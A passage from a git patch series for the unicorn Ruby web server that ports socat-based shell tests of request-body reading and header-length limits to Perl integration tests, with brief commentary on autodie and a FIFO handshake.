-#!/usr/bin/env ruby
-# -*- encoding: binary -*-
-# simple chunked HTTP PUT request generator (and just that),
-# it reads stdin and writes to stdout so socat can write to a
-# UNIX or TCP socket (or to another filter or file) along with
-# a Content-MD5 trailer.
-require 'digest/md5'
-$stdout.sync = $stderr.sync = true
-$stdout.binmode
-$stdin.binmode
-
-bs = ENV['bs'] ? ENV['bs'].to_i : 4096
-
-if ARGV.grep("--no-headers").empty?
-  $stdout.write(
-      "PUT / HTTP/1.1\r\n" \
-      "Host: example.com\r\n" \
-      "Transfer-Encoding: chunked\r\n" \
-      "Trailer: Content-MD5\r\n" \
-      "\r\n"
-    )
-end
-
-digest = Digest::MD5.new
-if buf = $stdin.readpartial(bs)
-  begin
-    digest.update(buf)
-    $stdout.write("%x\r\n" % [ buf.size ])
-    $stdout.write(buf)
-    $stdout.write("\r\n")
-  end while $stdin.read(bs, buf)
-end
-
-digest = [ digest.digest ].pack('m').strip
-$stdout.write("0\r\n")
-$stdout.write("Content-MD5: #{digest}\r\n\r\n")
diff --git a/t/integration.ru b/t/integration.ru
index 21f5449..98528f6 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -47,6 +47,29 @@ def env_dump(env)
   h.to_json
 end
 
+def rack_input_tests(env)
+  return [ 100, {}, [] ] if /\A100-continue\z/i =~ env['HTTP_EXPECT']
+  cap = 16384
+  require 'digest/sha1'
+  digest = Digest::SHA1.new
+  input = env['rack.input']
+  case env['PATH_INFO']
+  when '/rack_input/size_first'; input.size
+  when '/rack_input/rewind_first'; input.rewind
+  when '/rack_input'; # OK
+  else
+    abort "bad path: #{env['PATH_INFO']}"
+  end
+  if buf = input.read(rand(cap))
+    begin
+      raise "#{buf.size} > #{cap}" if buf.size > cap
+      digest.update(buf)
+    end while input.read(rand(cap), buf)
+  end
+  [ 200, {'content-length' => '40', 'content-type' => 'text/plain'},
+    [ digest.hexdigest ] ]
+end
+
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -66,6 +89,8 @@ def env_dump(env)
     end # case PATH_INFO (POST)
     # ...
   when 'PUT'
-    # ...
+    case env['PATH_INFO']
+    when %r{\A/rack_input}; rack_input_tests(env)
+    end
   end # case REQUEST_METHOD
 end) # run
diff --git a/t/integration.t b/t/integration.t
index b7ba1fb..8cef561 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -1,13 +1,16 @@
 #!perl -w
 # Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
 # License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+# this is the main integration test for things which don't require
+# restarting or signals
 
 use v5.14; BEGIN { require './t/lib.perl' };
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my $t0 = time;
 my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
-
+my $curl = which('curl');
+END { diag slurp("$tmpdir/err.log") if $tmpdir };
 sub slurp_hdr {
 	my ($c) = @_;
 	local $/ = "\r\n\r\n"; # affects both readline+chomp
@@ -17,6 +20,48 @@ sub slurp_hdr {
 	($status, \@hdr);
 }
 
+my %PUT = (
+	chunked_md5 => sub {
+		my ($in, $out, $path, %opt) = @_;
+		my $bs = $opt{bs} // 16384;
+		require Digest::MD5;
+		my $dig = Digest::MD5->new;
+		print $out <<EOM;
+PUT $path HTTP/1.1\r
+Transfer-Encoding: chunked\r
+Trailer: Content-MD5\r
+\r
+EOM
+		my ($buf, $r);
+		while (1) {
+			$r = read($in, $buf, $bs) // die "read: $!";
+			last if $r == 0;
+			printf $out "%x\r\n", length($buf);
+			print $out $buf, "\r\n";
+			$dig->add($buf);
+		}
+		print $out "0\r\nContent-MD5: ", $dig->b64digest, "\r\n\r\n";
+	},
+	identity => sub {
+		my ($in, $out, $path, %opt) = @_;
+		my $bs = $opt{bs} // 16384;
+		my $clen = $opt{-s} // -s $in;
+		print $out <<EOM;
+PUT $path HTTP/1.0\r
+Content-Length: $clen\r
+\r
+EOM
+		my ($buf, $r, $len);
+		while ($clen) {
+			$len = $clen > $bs ? $bs : $clen;
+			$r = read($in, $buf, $len) // die "read: $!";
+			die 'premature EOF' if $r == 0;
+			print $out $buf;
+			$clen -= $r;
+		}
+	},
+);
+
 my ($c, $status, $hdr);
 
 # response header tests
@@ -111,6 +156,55 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 414 \b!, '414 on FRAGMENT > (1024)');
 }
 
+# input tests
+my ($blob_size, $blob_hash);
+SKIP: {
+	open(my $rh, '<', 't/random_blob') or
+		skip "t/random_blob not generated $!", 1;
+	$blob_size = -s $rh;
+	require Digest::SHA;
+	$blob_hash = Digest::SHA->new(1)->addfile($rh)->hexdigest;
+
+	my $ck_hash = sub {
+		my ($sub, $path, %opt) = @_;
+		seek($rh, 0, SEEK_SET) // die "seek: $!";
+		$c = tcp_connect($srv);
+		$c->autoflush(0);
+		$PUT{$sub}->($rh, $c, $path, %opt);
+		$c->flush or die "flush: $!";
+		($status, $hdr) = slurp_hdr($c);
+		is(readline($c), $blob_hash, "$sub $path");
+	};
+	$ck_hash->('identity', '/rack_input', -s => $blob_size);
+	$ck_hash->('chunked_md5', '/rack_input');
+	$ck_hash->('identity', '/rack_input/size_first', -s => $blob_size);
+	$ck_hash->('identity', '/rack_input/rewind_first', -s => $blob_size);
+	$ck_hash->('chunked_md5', '/rack_input/size_first');
+	$ck_hash->('chunked_md5', '/rack_input/rewind_first');
+
+
+	$curl // skip 'no curl found in PATH', 1;
+
+	my ($copt, $cout);
+	my $url = "http://$host_port/rack_input";
+	my $do_curl = sub {
+		my (@arg) = @_;
+		pipe(my $cout, $copt->{1}) or die "pipe: $!";
+		open $copt->{2}, '>', "$tmpdir/curl.err" or die $!;
+		my $cpid = spawn($curl, '-sSf', @arg, $url, $copt);
+		close(delete $copt->{1}) or die "close: $!";
+		is(readline($cout), $blob_hash, "curl @arg response");
+		is(waitpid($cpid, 0), $cpid, "curl @arg exited");
+		is($?, 0, "no error from curl @arg");
+		is(slurp("$tmpdir/curl.err"), '', "no stderr from curl @arg");
+	};
+
+	$do_curl->(qw(-T t/random_blob));
+
+	seek($rh, 0, SEEK_SET) // die "seek: $!";
+	$copt->{0} = $rh;
+	$do_curl->('-T-');
+}
 
 # ... more stuff here
 undef $ar;
@@ -120,4 +214,5 @@ my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
 is_deeply(\@err, [], 'no unexpected errors in stderr');
 is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
 
+undef $tmpdir;
 done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index 7d712b5..ae9f197 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,7 +10,7 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port start_req);
+	SEEK_SET tcp_host_port start_req which spawn);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
@@ -193,4 +193,5 @@ Test::More->import;
 # try to ensure ->DESTROY fires:
 $SIG{TERM} = sub { exit(15 + 128) };
 $SIG{INT} = sub { exit(2 + 128) };
+$SIG{PIPE} = sub { exit(13 + 128) };
 1;
diff --git a/t/rack-input-tests.ru b/t/rack-input-tests.ru
deleted file mode 100644
index 5459e85..0000000
--- a/t/rack-input-tests.ru
+++ /dev/null
@@ -1,21 +0,0 @@
-# SHA1 checksum generator
-require 'digest/sha1'
-use Rack::ContentLength
-cap = 16384
-app = lambda do |env|
-  /\A100-continue\z/i =~ env['HTTP_EXPECT'] and
-    return [ 100, {}, [] ]
-  digest = Digest::SHA1.new
-  input = env['rack.input']
-  input.size if env["PATH_INFO"] == "/size_first"
-  input.rewind if env["PATH_INFO"] == "/rewind_first"
-  if buf = input.read(rand(cap))
-    begin
-      raise "#{buf.size} > #{cap}" if buf.size > cap
-      digest.update(buf)
-    end while input.read(rand(cap), buf)
-  end
-
-  [ 200, {'content-type' => 'text/plain'}, [ digest.hexdigest << "\n" ] ]
-end
-run app
diff --git a/t/t0100-rack-input-tests.sh b/t/t0100-rack-input-tests.sh
deleted file mode 100755
index ee7a437..0000000
--- a/t/t0100-rack-input-tests.sh
+++ /dev/null
@@ -1,124 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-test -r random_blob || die "random_blob required, run with 'make $0'"
-
-t_plan 10 "rack.input read tests"
-
-t_begin "setup and startup" && {
-	rtmpfiles curl_out curl_err
-	unicorn_setup
-	unicorn -E none -D rack-input-tests.ru -c $unicorn_config
-	blob_sha1=$(rsha1 < random_blob)
-	blob_size=$(count_bytes < random_blob)
-	t_info "blob_sha1=$blob_sha1"
-	unicorn_wait_start
-}
-
-t_begin "corked identity request" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT / HTTP/1.0\r\n'
-		printf 'Content-Length: %d\r\n\r\n' $blob_size
-		cat random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked chunked request" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		content-md5-put < random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked identity request (input#size first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /size_first HTTP/1.0\r\n'
-		printf 'Content-Length: %d\r\n\r\n' $blob_size
-		cat random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked identity request (input#rewind first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /rewind_first HTTP/1.0\r\n'
-		printf 'Content-Length: %d\r\n\r\n' $blob_size
-		cat random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked chunked request (input#size first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /size_first HTTP/1.1\r\n'
-		printf 'Host: example.com\r\n'
-		printf 'Transfer-Encoding: chunked\r\n'
-		printf 'Trailer: Content-MD5\r\n'
-		printf '\r\n'
-		content-md5-put --no-headers < random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked chunked request (input#rewind first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /rewind_first HTTP/1.1\r\n'
-		printf 'Host: example.com\r\n'
-		printf 'Transfer-Encoding: chunked\r\n'
-		printf 'Trailer: Content-MD5\r\n'
-		printf '\r\n'
-		content-md5-put --no-headers < random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "regular request" && {
-	curl -sSf -T random_blob http://$listen/ > $curl_out 2> $curl_err
-        test x$blob_sha1 = x$(cat $curl_out)
-        test ! -s $curl_err
-}
-
-t_begin "chunked request" && {
-	curl -sSf -T- < random_blob http://$listen/ > $curl_out 2> $curl_err
-        test x$blob_sha1 = x$(cat $curl_out)
-        test ! -s $curl_err
-}
-
-dbgcat r_err
-
-t_begin "shutdown" && {
-	kill $unicorn_pid
-}
-
-t_done

[-- Attachment #10: 0009-tests-use-autodie-to-simplify-error-checking.patch --]
[-- Type: text/x-diff, Size: 8495 bytes --]

From 3a1d015a3859b639d8e4463e9436a49f4f0f720e Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:38 +0000
Subject: [PATCH 09/23] tests: use autodie to simplify error checking

autodie is bundled with Perl 5.10+ and simplifies error
checking in most cases.  Some subroutines aren't perfectly
translatable and their call sites had to be tweaked, but
most of them translate cleanly.
---
 t/active-unix-socket.t | 13 +++++++------
 t/integration.t        | 37 +++++++++++++++++++------------------
 t/lib.perl             | 30 +++++++++++++++---------------
 3 files changed, 41 insertions(+), 39 deletions(-)

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index 6b5c218..1241904 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -4,17 +4,18 @@
 
 use v5.14; BEGIN { require './t/lib.perl' };
 use IO::Socket::UNIX;
+use autodie;
+no autodie 'kill';
 my %to_kill;
 END { kill('TERM', values(%to_kill)) if keys %to_kill }
 my $u1 = "$tmpdir/u1.sock";
 my $u2 = "$tmpdir/u2.sock";
 my $unix_req = sub {
 	my $s = IO::Socket::UNIX->new(Peer => shift, Type => SOCK_STREAM);
-	print $s @_, "\r\n\r\n" or die $!;
+	print $s @_, "\r\n\r\n";
 	$s;
 };
 {
-	use autodie;
 	open my $fh, '>', "$tmpdir/u1.conf.rb";
 	print $fh <<EOM;
 pid "$tmpdir/u.pid"
@@ -43,8 +44,8 @@ EOM
 my @uarg = qw(-D -E none t/integration.ru);
 
 # this pipe will be used to notify us when all daemons die:
-pipe(my ($p0, $p1)) or die "pipe: $!";
-fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+pipe(my $p0, my $p1);
+fcntl($p1, POSIX::F_SETFD, 0);
 
 # start the first instance
 unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
@@ -93,8 +94,8 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 
 # restart the first instance
 {
-	pipe(($p0, $p1)) or die "pipe: $!";
-	fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+	pipe($p0, $p1);
+	fcntl($p1, POSIX::F_SETFD, 0);
 	unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
 	is($?, 0, 'daemonized 1st process');
 	chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
diff --git a/t/integration.t b/t/integration.t
index 8cef561..af17d51 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -5,6 +5,7 @@
 # restarting or signals
 
 use v5.14; BEGIN { require './t/lib.perl' };
+use autodie;
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my $t0 = time;
@@ -34,7 +35,7 @@ Trailer: Content-MD5\r
 EOM
 		my ($buf, $r);
 		while (1) {
-			$r = read($in, $buf, $bs) // die "read: $!";
+			$r = read($in, $buf, $bs);
 			last if $r == 0;
 			printf $out "%x\r\n", length($buf);
 			print $out $buf, "\r\n";
@@ -54,7 +55,7 @@ EOM
 		my ($buf, $r, $len);
 		while ($clen) {
 			$len = $clen > $bs ? $bs : $clen;
-			$r = read($in, $buf, $len) // die "read: $!";
+			$r = read($in, $buf, $len);
 			die 'premature EOF' if $r == 0;
 			print $out $buf;
 			$clen -= $r;
@@ -130,28 +131,28 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 400 \b!, 'got 400 on bad request');
 
 	$c = tcp_connect($srv);
-	print $c 'GET /' or die $!;
+	print $c 'GET /';
 	my $buf = join('', (0..9), 'ab');
-	for (0..1023) { print $c $buf or die $! }
-	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	for (0..1023) { print $c $buf }
+	print $c " HTTP/1.0\r\n\r\n";
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on REQUEST_PATH > (12 * 1024)');
 
 	$c = tcp_connect($srv);
-	print $c 'GET /hello-world?a' or die $!;
+	print $c 'GET /hello-world?a';
 	$buf = join('', (0..9));
-	for (0..1023) { print $c $buf or die $! }
-	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	for (0..1023) { print $c $buf }
+	print $c " HTTP/1.0\r\n\r\n";
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on QUERY_STRING > (10 * 1024)');
 
 	$c = tcp_connect($srv);
-	print $c 'GET /hello-world#a' or die $!;
+	print $c 'GET /hello-world#a';
 	$buf = join('', (0..9), 'a'..'f');
-	for (0..63) { print $c $buf or die $! }
-	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	for (0..63) { print $c $buf }
+	print $c " HTTP/1.0\r\n\r\n";
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 414 \b!, '414 on FRAGMENT > (1024)');
 }
@@ -159,7 +160,7 @@ if ('bad requests') {
 # input tests
 my ($blob_size, $blob_hash);
 SKIP: {
-	open(my $rh, '<', 't/random_blob') or
+	CORE::open(my $rh, '<', 't/random_blob') or
 		skip "t/random_blob not generated $!", 1;
 	$blob_size = -s $rh;
 	require Digest::SHA;
@@ -167,11 +168,11 @@ SKIP: {
 
 	my $ck_hash = sub {
 		my ($sub, $path, %opt) = @_;
-		seek($rh, 0, SEEK_SET) // die "seek: $!";
+		seek($rh, 0, SEEK_SET);
 		$c = tcp_connect($srv);
 		$c->autoflush(0);
 		$PUT{$sub}->($rh, $c, $path, %opt);
-		$c->flush or die "flush: $!";
+		$c->flush or die $!;
 		($status, $hdr) = slurp_hdr($c);
 		is(readline($c), $blob_hash, "$sub $path");
 	};
@@ -189,10 +190,10 @@ SKIP: {
 	my $url = "http://$host_port/rack_input";
 	my $do_curl = sub {
 		my (@arg) = @_;
-		pipe(my $cout, $copt->{1}) or die "pipe: $!";
-		open $copt->{2}, '>', "$tmpdir/curl.err" or die $!;
+		pipe(my $cout, $copt->{1});
+		open $copt->{2}, '>', "$tmpdir/curl.err";
 		my $cpid = spawn($curl, '-sSf', @arg, $url, $copt);
-		close(delete $copt->{1}) or die "close: $!";
+		close(delete $copt->{1});
 		is(readline($cout), $blob_hash, "curl @arg response");
 		is(waitpid($cpid, 0), $cpid, "curl @arg exited");
 		is($?, 0, "no error from curl @arg");
@@ -201,7 +202,7 @@ SKIP: {
 
 	$do_curl->(qw(-T t/random_blob));
 
-	seek($rh, 0, SEEK_SET) // die "seek: $!";
+	seek($rh, 0, SEEK_SET);
 	$copt->{0} = $rh;
 	$do_curl->('-T-');
 }
diff --git a/t/lib.perl b/t/lib.perl
index ae9f197..49632cf 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -4,6 +4,7 @@
 package UnicornTest;
 use v5.14;
 use parent qw(Exporter);
+use autodie;
 use Test::More;
 use IO::Socket::INET;
 use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
@@ -14,7 +15,7 @@ our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
-open($errfh, '>>', "$tmpdir/err.log") or die "open: $!";
+open($errfh, '>>', "$tmpdir/err.log");
 
 sub tcp_server {
 	my %opt = (
@@ -62,14 +63,14 @@ sub tcp_connect {
 sub start_req {
 	my ($srv, @req) = @_;
 	my $c = tcp_connect($srv);
-	print $c @req, "\r\n\r\n" or die "print: $!";
+	print $c @req, "\r\n\r\n";
 	$c;
 }
 
 sub slurp {
-	open my $fh, '<', $_[0] or die "open($_[0]): $!";
+	open my $fh, '<', $_[0];
 	local $/;
-	<$fh>;
+	readline($fh);
 }
 
 sub spawn {
@@ -80,8 +81,8 @@ sub spawn {
 	my $set = POSIX::SigSet->new;
 	$set->fillset or die "sigfillset: $!";
 	sigprocmask(SIG_SETMASK, $set, $old) or die "SIG_SETMASK: $!";
-	pipe(my ($r, $w)) or die "pipe: $!";
-	my $pid = fork // die "fork: $!";
+	pipe(my $r, my $w);
+	my $pid = fork;
 	if ($pid == 0) {
 		close $r;
 		$SIG{__DIE__} = sub {
@@ -94,9 +95,9 @@ sub spawn {
 		my $cfd;
 		for ($cfd = 0; ($cfd < 3) || defined($opt->{$cfd}); $cfd++) {
 			my $io = $opt->{$cfd} // next;
-			my $pfd = fileno($io) // die "fileno($io): $!";
+			my $pfd = fileno($io);
 			if ($pfd == $cfd) {
-				fcntl($io, F_SETFD, 0) // die "F_SETFD: $!";
+				fcntl($io, F_SETFD, 0);
 			} else {
 				dup2($pfd, $cfd) // die "dup2($pfd, $cfd): $!";
 			}
@@ -110,9 +111,7 @@ sub spawn {
 			setpgid(0, $pgid) // die "setpgid(0, $pgid): $!";
 		}
 		$SIG{$_} = 'DEFAULT' for grep(!/^__/, keys %SIG);
-		if (defined(my $cd = $opt->{-C})) {
-			chdir $cd // die "chdir($cd): $!";
-		}
+		if (defined(my $cd = $opt->{-C})) { chdir $cd }
 		$old->delset(POSIX::SIGCHLD) or die "sigdelset CHLD: $!";
 		sigprocmask(SIG_SETMASK, $old) or die "SIG_SETMASK: ~CHLD: $!";
 		@ENV{keys %$env} = values(%$env) if $env;
@@ -162,22 +161,23 @@ sub unicorn {
 # automatically kill + reap children when this goes out-of-scope
 package UnicornTest::AutoReap;
 use v5.14;
+use autodie;
 
 sub new {
 	my (undef, $pid) = @_;
 	bless { pid => $pid, owner => $$ }, __PACKAGE__
 }
 
-sub kill {
+sub do_kill {
 	my ($self, $sig) = @_;
-	CORE::kill($sig // 'TERM', $self->{pid});
+	kill($sig // 'TERM', $self->{pid});
 }
 
 sub join {
 	my ($self, $sig) = @_;
 	my $pid = delete $self->{pid} or return;
-	CORE::kill($sig, $pid) if defined $sig;
-	my $ret = waitpid($pid, 0) // die "waitpid($pid): $!";
+	kill($sig, $pid) if defined $sig;
+	my $ret = waitpid($pid, 0);
 	$ret == $pid or die "BUG: waitpid($pid) != $ret";
 }
 

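A note on the autodie conversion above: with the pragma loaded, built-ins
such as open, close, pipe, seek and fcntl throw with "$!" on failure, so
the explicit `or die' checks go away.  kill is exempted since a false
return is a normal result there (the END block and the kill(0, ...) probes
check it by hand), and CORE::open remains where a failure is handled with
skip() rather than dying.  A minimal sketch of the idiom; the path below
is purely illustrative:

	use v5.14;
	use autodie;        # open/close/pipe/seek/fcntl now die with $! on failure
	no autodie 'kill';  # kill's return value stays meaningful

	my $path = ($ENV{TMPDIR} // '/tmp') . '/autodie-demo.log'; # illustrative
	open my $fh, '>>', $path;   # no "or die ..." needed
	say $fh 'hello';
	close $fh;

	my $alive = kill 0, $$;     # 0 here is a normal answer, not an exception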
[-- Attachment #11: 0010-port-t0019-max_header_len.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 5571 bytes --]

From 43c7d73b8b9e6995b5a986b10a8623395e89a538 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:39 +0000
Subject: [PATCH 10/23] port t0019-max_header_len.sh to Perl 5

This was the final socat requirement for integration tests.
I think curl will remain an optional dependency for tests
since it's probably the most widely-installed HTTP client.
---
 GNUmakefile               |  2 +-
 t/README                  |  7 +-----
 t/integration.ru          |  1 +
 t/integration.t           | 43 +++++++++++++++++++++++++++++++---
 t/t0019-max_header_len.sh | 49 ---------------------------------------
 5 files changed, 43 insertions(+), 59 deletions(-)
 delete mode 100755 t/t0019-max_header_len.sh

diff --git a/GNUmakefile b/GNUmakefile
index 5cca189..eab9082 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -125,7 +125,7 @@ $(T_sh): dep $(test_prereq) t/random_blob t/trash/.gitignore
 t/trash/.gitignore : | t/trash
 	echo '*' >$@
 
-dependencies := socat curl
+dependencies := curl
 deps := $(addprefix t/.dep+,$(dependencies))
 $(deps): dep_bin = $(lastword $(subst +, ,$@))
 $(deps):
diff --git a/t/README b/t/README
index 8a5243e..d09c715 100644
--- a/t/README
+++ b/t/README
@@ -10,18 +10,13 @@ to test real-world behavior and Ruby introduces incompatibilities
 at a far faster rate than Perl 5.  Perl is Ruby's older cousin, so
 it should be easy-to-learn for Rubyists.
 
-Old tests are in Bourne shell, but the socat(1) dependency was probably
-too rare compared to Perl 5.
+Old tests are in Bourne shell and slowly being ported to Perl 5.
 
 == Requirements
 
 * {Ruby 2.0.0+}[https://www.ruby-lang.org/en/]
 * {Perl 5.14+}[https://www.perl.org/] # your distro should have it
 * {GNU make}[https://www.gnu.org/software/make/]
-
-The following requirements will eventually be dropped.
-
-* {socat}[http://www.dest-unreach.org/socat/]
 * {curl}[https://curl.haxx.se/]
 
 We do not use bashisms or any non-portable, non-POSIX constructs
diff --git a/t/integration.ru b/t/integration.ru
index 98528f6..edc408c 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -81,6 +81,7 @@ def rack_input_tests(env)
     when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
     when '/pid'; [ 200, {}, [ "#$$\n" ] ]
+    else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
     case env['PATH_INFO']
diff --git a/t/integration.t b/t/integration.t
index af17d51..c687655 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -1,15 +1,19 @@
 #!perl -w
 # Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
 # License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
-# this is the main integration test for things which don't require
-# restarting or signals
+
+# This is the main integration test for fast-ish things to minimize
+# Ruby startup time penalties.
 
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my $t0 = time;
-my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
+my $conf = "$tmpdir/u.conf.rb";
+open my $conf_fh, '>', $conf;
+$conf_fh->autoflush(1);
+my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');
 END { diag slurp("$tmpdir/err.log") if $tmpdir };
 sub slurp_hdr {
@@ -207,7 +211,40 @@ SKIP: {
 	$do_curl->('-T-');
 }
 
+
 # ... more stuff here
+
+# SIGHUP-able stuff goes here
+
+if ('max_header_len internal API') {
+	undef $c;
+	my $req = 'GET / HTTP/1.0';
+	my $len = length($req."\r\n\r\n");
+	my $fifo = "$tmpdir/fifo";
+	POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
+	print $conf_fh <<EOM;
+Unicorn::HttpParser.max_header_len = $len
+listen "$host_port" # TODO: remove this requirement for SIGHUP
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+	$ar->do_kill('HUP');
+	open my $fifo_fh, '<', $fifo;
+	my $wpid = readline($fifo_fh);
+	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
+	close $fifo_fh;
+	$wpid =~ s/\Apid=// or die;
+	ok(CORE::kill(0, $wpid), 'worker PID retrieved');
+
+	$c = start_req($srv, $req);
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200\b!, 'minimal request succeeds');
+
+	$c = start_req($srv, 'GET /xxxxxx HTTP/1.0');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 413\b!, 'big request fails');
+}
+
+
 undef $ar;
 my @log = slurp("$tmpdir/err.log");
 diag("@log") if $ENV{V};
diff --git a/t/t0019-max_header_len.sh b/t/t0019-max_header_len.sh
deleted file mode 100755
index 6a355b4..0000000
--- a/t/t0019-max_header_len.sh
+++ /dev/null
@@ -1,49 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 5 "max_header_len setting (only intended for Rainbows!)"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	req='GET / HTTP/1.0\r\n\r\n'
-	len=$(printf "$req" | count_bytes)
-	echo Unicorn::HttpParser.max_header_len = $len >> $unicorn_config
-	unicorn -D -c $unicorn_config env.ru
-	unicorn_wait_start
-}
-
-t_begin "minimal request succeeds" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf "$req"
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-	test xok = x$(cat $ok)
-
-	fgrep "HTTP/1.1 200 OK" $tmp
-}
-
-t_begin "big request fails" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'GET /xxxxxx HTTP/1.0\r\n\r\n'
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-	test xok = x$(cat $ok)
-	fgrep "HTTP/1.1 413" $tmp
-}
-
-dbgcat tmp
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr" && {
-	check_stderr
-}
-
-t_done

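The SIGHUP handling above leans on a small FIFO handshake to know when the
reloaded worker is ready: the appended after_fork hook opens the FIFO for
writing and prints "pid=#$$", while the test side blocks in a read-only
open until that writer shows up.  The same pattern reduced to its
essentials (the temporary directory and the forked stand-in for the worker
are illustrative only):

	use v5.14;
	use POSIX ();
	use File::Temp 0.19 ();

	my $dir = File::Temp->newdir('fifo-demo-XXXX', TMPDIR => 1);
	my $fifo = "$dir/fifo";
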